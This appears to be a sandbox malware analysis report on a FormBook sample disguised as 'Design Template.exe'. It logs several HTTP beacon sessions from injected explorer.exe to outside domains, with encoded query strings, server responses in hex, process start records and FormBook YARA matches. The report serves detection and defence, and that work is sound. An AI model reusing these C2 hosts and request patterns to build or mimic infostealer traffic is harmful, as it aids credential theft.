                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.74970547.105.113.14180C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Apr 12, 2021 14:42:39.589682102 CEST1341OUTGET /ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx HTTP/1.1
                                                                              Host: www.zq2003.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Apr 12, 2021 14:42:40.012196064 CEST1342INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 12 Apr 2021 12:42:39 GMT
                                                                              Server: Apache/2.4.46 (Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9a
                                                                              Content-Length: 315
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              1192.168.2.74971234.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Apr 12, 2021 14:42:55.833060026 CEST1619OUTGET /ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== HTTP/1.1
                                                                              Host: www.betralifcannabis.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Apr 12, 2021 14:42:55.970349073 CEST1626INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:42:55 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "607068c2-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              2192.168.2.749724156.226.160.5680C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Apr 12, 2021 14:43:06.316806078 CEST7243OUTGET /ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== HTTP/1.1
                                                                              Host: www.2elden.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Apr 12, 2021 14:43:09.141789913 CEST7244INHTTP/1.1 302 Moved Temporarily
                                                                              Date: Mon, 12 Apr 2021 12:43:06 GMT
                                                                              Server: Apache
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              Set-Cookie: PHPSESSID=r893585h6frffsmmhi15aetfq1; path=/
                                                                              Upgrade: h2
                                                                              Connection: Upgrade, close
                                                                              Location: /
                                                                              Content-Length: 0
                                                                              Content-Type: text/html; charset=gbk


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              3192.168.2.749725198.50.252.6480C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Apr 12, 2021 14:43:12.049977064 CEST7245OUTGET /ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx HTTP/1.1
                                                                              Host: www.landreclaim.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Apr 12, 2021 14:43:12.192271948 CEST7246INHTTP/1.1 200 OK
                                                                              Date: Mon, 12 Apr 2021 12:43:12 GMT
                                                                              Server: Apache
                                                                              Cache-Control: no-cache, must-revalidate
                                                                              Connection: close
                                                                              Transfer-Encoding: chunked
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 31 64 37 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 70 61 72 6b 65 64 20 62 79 20 4f 6e 6c 79 44 6f 6d 61 69 6e 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 42 56 59 69 69 53 49 46 65 4b 31 64 47 6d 4a 52 41 6b 79 63 75 48 41 48 52 67 33 32 4f 6d 55 63 77 77 37 6f 6e 33 52 59 64 67 34 56 61 2b 50 6d 53 54 73 7a 2f 4b 36 38 76 62 64 45 6a 68 34 75 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 34 2e 37 2e 30 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 77 76 66 58 70 71 70 5a 5a 56 51 47 4b 36 54 41 68 35 50 56 6c 47 4f 66 51 4e 48 53 6f 44 32 78 62 45 2b 51 6b 50 78 43 41 46 6c 4e 45 65 76 6f 45 48 33 53 6c 30 73 69 62 56 63 4f 51 56 6e 4e 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 7d 0a 09 2a 3a 3a 61 66 74 65 72 2c 20 2a 3a 3a 62 65 66 6f 72 65 20 7b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 7d 0a 09 61 2c 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 23 46 46 35 38 35 30 3b 20 7d 0a 0a 09 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 25 3b 20 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 49 6e 74 65 72 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b
                                                                              Data Ascii: 1d73<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Domain parked by OnlyDomains</title><meta name="description" content=""><meta name="keywords" content=""><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"><link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous"><style>*{margin:0;padding:0; box-sizing: border-box;}*::after, *::before { box-sizing: border-box; }a, a:link, a:visited { color: #FF5850; }html, body {height:100%;width:100%; overflow-x: hidden;font-family: Inter, Arial, sans-serif; font-size: 16px;


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              4192.168.2.749726160.153.136.380C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Apr 12, 2021 14:43:17.353806019 CEST7254OUTGET /ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== HTTP/1.1
                                                                              Host: www.rememberingedward.info
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Apr 12, 2021 14:43:17.404323101 CEST7254INHTTP/1.1 302 Found
                                                                              Connection: close
                                                                              Pragma: no-cache
                                                                              cache-control: no-cache
                                                                              Location: /ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA==


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              5192.168.2.74972714.215.190.6580C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Apr 12, 2021 14:43:23.581275940 CEST7255OUTGET /ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx HTTP/1.1
                                                                              Host: www.chuanyangwenhua.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Apr 12, 2021 14:43:23.831491947 CEST7255INHTTP/1.1 404 Not Found
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:43:23 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Set-Cookie: BAEID=FDD9965F60D324C96ADED23F19A33FCC; expires=Tue, 12-Apr-22 12:43:23 GMT; max-age=31536000; path=/; version=1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                              Apr 12, 2021 14:43:24.032521963 CEST7256INHTTP/1.1 404 Not Found
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:43:23 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Set-Cookie: BAEID=FDD9965F60D324C96ADED23F19A33FCC; expires=Tue, 12-Apr-22 12:43:23 GMT; max-age=31536000; path=/; version=1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              6192.168.2.74972834.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Apr 12, 2021 14:43:28.962619066 CEST7257OUTGET /ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== HTTP/1.1
                                                                              Host: www.bestflowersandgifts.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Apr 12, 2021 14:43:29.099579096 CEST7258INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:43:29 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "60704793-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              7192.168.2.74973334.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Apr 12, 2021 14:43:39.946073055 CEST7302OUTGET /ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== HTTP/1.1
                                                                              Host: www.sci-mfg.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Apr 12, 2021 14:43:40.083059072 CEST7303INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:43:40 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "607068c2-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              8192.168.2.74973634.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Apr 12, 2021 14:43:50.370038033 CEST7318OUTGET /ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== HTTP/1.1
                                                                              Host: www.sexichef.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Apr 12, 2021 14:43:50.506458044 CEST7319INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:43:50 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "60737c38-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Code Manipulations

                                                                              Statistics

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Start time:14:41:27
                                                                              Start date:12/04/2021
                                                                              Path:C:\Users\user\Desktop\Design Template.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Design Template.exe'
                                                                              Imagebase:0x400000
                                                                              File size:479232 bytes
                                                                              MD5 hash:56D56566623A2BC942141B56F9DD3DA5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              General

                                                                              Start time:14:41:46
                                                                              Start date:12/04/2021
                                                                              Path:C:\Users\user\Desktop\Design Template.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\Design Template.exe
                                                                              Imagebase:0x400000
                                                                              File size:479232 bytes
                                                                              MD5 hash:56D56566623A2BC942141B56F9DD3DA5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              General

                                                                              Start time:14:41:49
                                                                              Start date:12/04/2021
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:
                                                                              Imagebase:0x7ff662bf0000
                                                                              File size:3933184 bytes
                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:14:42:06
                                                                              Start date:12/04/2021
                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                              Imagebase:0x1030000
                                                                              File size:61952 bytes
                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
